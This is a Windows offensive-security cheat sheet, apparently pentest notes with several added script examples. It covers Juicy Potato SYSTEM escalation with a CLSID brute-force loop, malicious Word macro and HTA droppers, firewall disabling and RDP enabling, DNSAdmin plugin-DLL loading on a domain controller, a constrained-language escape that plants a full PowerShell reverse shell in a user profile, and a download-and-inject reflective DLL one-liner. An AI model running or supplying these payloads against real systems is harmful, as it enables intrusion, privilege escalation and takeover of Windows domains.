Use a Windows VM, install the required tools from here (HTML Help Workshop), then get the Nishang script Out-CHM.ps1 and create your payload:
Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Juicy Potato

Metasploit (Details)

use windows/local/ms16_075_reflection_juicy
set SESSION <>
set CLSID <>
run
The CLSID must belong to a COM server that the target OS version ships and that runs as SYSTEM; if one fails, try the next. Common CLSIDs for the exploit are:
  • {e60687f7-01a1-40aa-86ac-db1cbf673334}
  • {752073A1-23F2-4396-85F0-8FDB879ED0ED}
  • {3c6859ce-230b-48a4-be6c-932c0c202048}
  • {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
  • {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
  • More can be found here
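The same CLSID hunt with the standalone JuicyPotato.exe instead of Metasploit, as an added example that is not part of the original page: the script checks for an impersonation privilege first (without SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege the technique cannot work), then tries each CLSID from the list above until one spawns a SYSTEM process. The binary path, the proof-file path and the listener port are assumptions; JuicyPotato no longer works on Windows 10 1809 / Server 2019 and later, where PrintSpoofer or RoguePotato are the usual replacements.

```powershell
# Added example: iterate candidate CLSIDs with the standalone JuicyPotato.exe.
# Assumed: JuicyPotato.exe dropped to C:\Windows\Temp, port 1337 free on the target.
$Juicy  = 'C:\Windows\Temp\JuicyPotato.exe'     # assumed path
$Proof  = 'C:\Windows\Temp\jp_whoami.txt'       # assumed scratch file
$Clsids = @(
    '{e60687f7-01a1-40aa-86ac-db1cbf673334}',
    '{752073A1-23F2-4396-85F0-8FDB879ED0ED}',
    '{3c6859ce-230b-48a4-be6c-932c0c202048}',
    '{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}',
    '{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}'
)

# Prerequisite: the current token must hold an impersonation privilege (enabled or not).
$privs = whoami /priv
if (-not ($privs -match 'SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege')) {
    Write-Warning 'No SeImpersonate/SeAssignPrimaryToken privilege; JuicyPotato cannot work from this context.'
    return
}

foreach ($clsid in $Clsids) {
    Remove-Item $Proof -ErrorAction SilentlyContinue
    # -t * : try both CreateProcessWithTokenW and CreateProcessAsUser
    # -l   : local port for the COM server listener
    # -p/-a: program and arguments launched with the stolen SYSTEM token
    & $Juicy -t * -p 'C:\Windows\System32\cmd.exe' -a "/c whoami > $Proof" -l 1337 -c $clsid | Out-Null
    Start-Sleep -Seconds 2

    if ((Test-Path $Proof) -and ((Get-Content $Proof) -match 'nt authority\\system')) {
        Write-Host "[+] $clsid works, payload ran as: $(Get-Content $Proof)"
        break
    }
    Write-Host "[-] $clsid failed on this host"
}
```

Once a working CLSID is known, replace the whoami payload with the real one (a reverse shell or a user add); keep the `-t *` flag, since which of the two CreateProcess* calls succeeds depends on which privilege the token holds.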

Word Macro

Simple Word macro (View > Macros; before delivery use File > Info > Check for Issues > Inspect Document to purge personal details), save as .doc. AutoOpen must call the worker function, otherwise nothing runs when the document is opened:
Sub DoStuff()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "<powershell command here>"
    Set wsh = Nothing
End Sub

Sub AutoOpen()
    DoStuff
End Sub
Alternatively we can use an HTA. The function has to be invoked after its definition (or from window.onload); the second argument to Run (0) hides the console window:
<script language="VBScript">
Function DoStuff()
    Dim wsh
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "powershell -Sta -Nop -WindowStyle Hidden -EncodedCommand <blah>", 0
    Set wsh = Nothing
End Function
DoStuff
</script>

Building and Signing MSIs

Use WiX to generate MSI files from XML or to manipulate existing MSI files. A complete example can be seen in the Ethereal writeup.

Windows Firewall

List rules

netsh advfirewall firewall show rule name=all

Enable RDP via cmd

The registry value below only clears the Terminal Services "deny connections" flag; it does not touch the firewall, so the Remote Desktop rule group has to be allowed as well (second command):
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Enable RDP via PowerShell

The whole command goes in double quotes so that cmd.exe passes it through and PowerShell executes it (in single quotes it would be treated as a string literal and merely echoed):
powershell.exe -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections' -Value 0"

Disable Firewall on any Windows via cmd

This is noisy (all profiles go to state off and the change is logged); prefer enabling only the rule you need.
netsh advfirewall set allprofiles state off
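The targeted alternative to switching the firewall off, as an added example that is not part of the original page: it clears fDenyTSConnections, enables only the Remote Desktop rule group, and then reports what is actually in effect so the change can be verified before connecting. It relies on the NetSecurity module (Windows 8 / Server 2012 and later); on Windows 7 the netsh commands above are the only option. The function name and the -AllowFromAllProfiles switch are my own.

```powershell
# Added example: enable RDP without disabling the firewall, then verify.
function Enable-RdpAccess {
    [CmdletBinding()]
    param([switch]$AllowFromAllProfiles)

    $tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

    # 1. Allow Terminal Services connections (0 = allow, 1 = deny).
    Set-ItemProperty -Path $tsKey -Name fDenyTSConnections -Value 0 -Type DWord

    # 2. Open only the RDP rule group instead of turning whole profiles off.
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    if ($AllowFromAllProfiles) {
        # By default the rules may be scoped to Domain/Private; widen them if the host sits in a Public profile.
        Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Set-NetFirewallRule -Profile Any
    }

    # 3. Report the effective state: registry flag, profile state, rule count, listener.
    [pscustomobject]@{
        DenyTSConnections = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections
        FirewallProfiles  = (Get-NetFirewallProfile | ForEach-Object { "$($_.Name)=$($_.Enabled)" }) -join ', '
        RdpRulesEnabled   = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Where-Object Enabled -eq 'True').Count
        Port3389Listening = (Test-NetConnection -ComputerName localhost -Port 3389 -WarningAction SilentlyContinue).TcpTestSucceeded
    }
}

Enable-RdpAccess -AllowFromAllProfiles
```

If Port3389Listening stays false after DenyTSConnections reads 0, the TermService listener has not started yet; `Restart-Service TermService` (or a short wait) fixes that. Network Level Authentication is a separate setting (UserAuthentication under WinStations\RDP-Tcp) and is not touched here.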

Load DLL from System32

Windows 10


To run commands with runas, the user has to have logged in at least once.


Elevate Privileges by loading a custom DLL as DNSAdmin

# requires RSAT (dnscmd). The share must be readable by the DC's computer account, because the DNS service fetches the DLL as SYSTEM.
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>
# alternatively via the DnsServer PowerShell module (also RSAT)
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose
Then restart the DNS service on the DC (the DLL is loaded at service start, so the account used needs the right to stop and start the service there):
sc.exe \\<dc> stop dns
sc.exe \\<dc> start dns
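The same procedure as a script with the two things the one-liners above leave out, as an added example that is not part of the original page: waiting for the service to actually reach STOPPED before starting it again (otherwise the start races the stop), and cleaning up afterwards, because the DC keeps trying to load the DLL on every DNS start and will stay down once the share disappears. The DC name, the UNC path and the registry-based cleanup (it deletes the value dnscmd wrote, which needs remote registry rights on the DC) are assumptions for the demo.

```powershell
# Added example: DNSAdmins plugin load with a service-state check and cleanup.
param(
    [string]$Dc     = 'dc01.corp.local',                # assumed DC
    [string]$DllUnc = '\\10.10.14.5\share\plugin.dll'   # assumed share readable by the DC machine account
)

function Set-DnsPlugin([string]$Target, [string]$Path) {
    if ($Path) {
        dnscmd $Target /config /serverlevelplugindll $Path | Out-Null
    } else {
        # Cleanup: remove the value dnscmd stores under the DNS service parameters key.
        reg.exe delete "\\$Target\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /f | Out-Null
    }
}

function Get-DnsServiceState([string]$Target) {
    # sc.exe query prints a line like "STATE : 4 RUNNING"; return just that line.
    (sc.exe \\$Target query dns) -match 'STATE'
}

function Restart-RemoteDns([string]$Target) {
    sc.exe \\$Target stop dns | Out-Null
    do { Start-Sleep -Seconds 1 } until ((Get-DnsServiceState $Target) -match 'STOPPED')
    sc.exe \\$Target start dns | Out-Null
    # Wait until the service settles: RUNNING means the DLL was loaded (or ignored), STOPPED means it crashed the start.
    do { Start-Sleep -Seconds 1; $state = Get-DnsServiceState $Target } until ($state -match 'RUNNING|STOPPED')
    return [bool]($state -match 'RUNNING')
}

Set-DnsPlugin -Target $Dc -Path $DllUnc
if (Restart-RemoteDns -Target $Dc) {
    Write-Host "[+] DNS service is back up on $Dc; the plugin DLL was loaded at start."
} else {
    Write-Warning "DNS service on $Dc did not come back (unreachable share or a DLL without the expected plugin exports). Cleaning up."
}

# Always clean up, or the DC's DNS service keeps loading the DLL on every start.
Set-DnsPlugin -Target $Dc -Path $null
Restart-RemoteDns -Target $Dc | Out-Null
```

Keep the DLL's DllMain side-effect short (spawn a process and return), since the DNS service is blocked until it returns; an outage of the DC's resolver is what gets this noticed.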

DNS Enumeration/Exploitation Tools

Bypass JEA

When in ConstrainedLanguage mode, the variable-path syntax still reaches the file system provider:

Read File:
${C:\file.txt}
Write File:
${C:\file.txt} = 'content'
Break out by writing a PowerShell profile (executed whenever a normal PowerShell is started by this user):
${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
Via Script Blocks:
& { ls }
Custom function:
PS>function xct { ls };
These tricks only work in ConstrainedLanguage mode. A JEA endpoint should use NoLanguage (the default for RestrictedRemoteServer session configurations), where variable assignment, script blocks and function definitions are not available at all and only the exposed cmdlets can be called.
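Both sides of this check, as an added example that is not part of the original page: Test-ClmEscape runs inside a session and reports which of the tricks above still work (and confirms that arbitrary .NET types, the thing CLM actually blocks, are unavailable), while New-HardenedJeaConfig writes a role capability and a session configuration in NoLanguage mode, where the probe function cannot even be defined. The scratch file, output directory, role name and group name are assumptions.

```powershell
# Added example: probe the current language mode, and write a JEA config that closes the gaps.
function Test-ClmEscape {
    $probe   = 'C:\Windows\Temp\clm_probe.txt'   # assumed scratch path (must match the literal below)
    $results = [ordered]@{ LanguageMode = "$($ExecutionContext.SessionState.LanguageMode)" }

    # Variable-path write then read: allowed in ConstrainedLanguage, impossible in NoLanguage.
    try     { ${C:\Windows\Temp\clm_probe.txt} = 'probe'; $results.VarPathWrite = (${C:\Windows\Temp\clm_probe.txt} -eq 'probe') }
    catch   { $results.VarPathWrite = $false }
    finally { Remove-Item $probe -ErrorAction SilentlyContinue }

    try { $results.ScriptBlock = ((& { 1 + 1 }) -eq 2) }            catch { $results.ScriptBlock = $false }
    try { function tmpfn { 2 }; $results.Function = ((tmpfn) -eq 2) } catch { $results.Function = $false }

    # What CLM does stop: instantiating non-core .NET types (fails with "Only core types are supported").
    try { [System.Net.WebClient]::new() | Out-Null; $results.DotNetTypes = $true } catch { $results.DotNetTypes = $false }

    [pscustomobject]$results
}

function New-HardenedJeaConfig {
    param([string]$OutDir = 'C:\ProgramData\JEA')   # assumed
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $psrc = Join-Path $OutDir 'ServiceOps.psrc'
    $pssc = Join-Path $OutDir 'ServiceOps.pssc'

    # Role capability: only the cmdlets the operator needs, with parameter values pinned.
    New-PSRoleCapabilityFile -Path $psrc -VisibleCmdlets 'Get-Service',
        @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler', 'W32Time' } }

    # Session configuration: RestrictedRemoteServer already implies NoLanguage; state it explicitly anyway.
    New-PSSessionConfigurationFile -Path $pssc -SessionType RestrictedRemoteServer -LanguageMode NoLanguage `
        -RunAsVirtualAccount -RoleDefinitions @{ 'CORP\ServiceOperators' = @{ RoleCapabilityFiles = $psrc } }

    # Returns $true when the .pssc parses and validates.
    Test-PSSessionConfigurationFile -Path $pssc
}
```

Register the file with `Register-PSSessionConfiguration -Name ServiceOps -Path C:\ProgramData\JEA\ServiceOps.pssc` and then connect with `Enter-PSSession -ComputerName <host> -ConfigurationName ServiceOps`: in that session `Test-ClmEscape`, `${C:\file.txt}` and `& { ls }` all fail to parse, which is the behaviour a JEA endpoint should show. If an existing endpoint instead reports LanguageMode = ConstrainedLanguage, every trick on this page applies to it.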

RCE via Cab Files

Reflectively load DLL into explorer.exe

PowerShell one-liner held in a C# string (for a loader that hands it to a runspace); Invoke-ReflectivePEInjection is the PowerSploit script, the DLL and the script are both pulled over HTTP:
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";

Dump Sticky Note Contents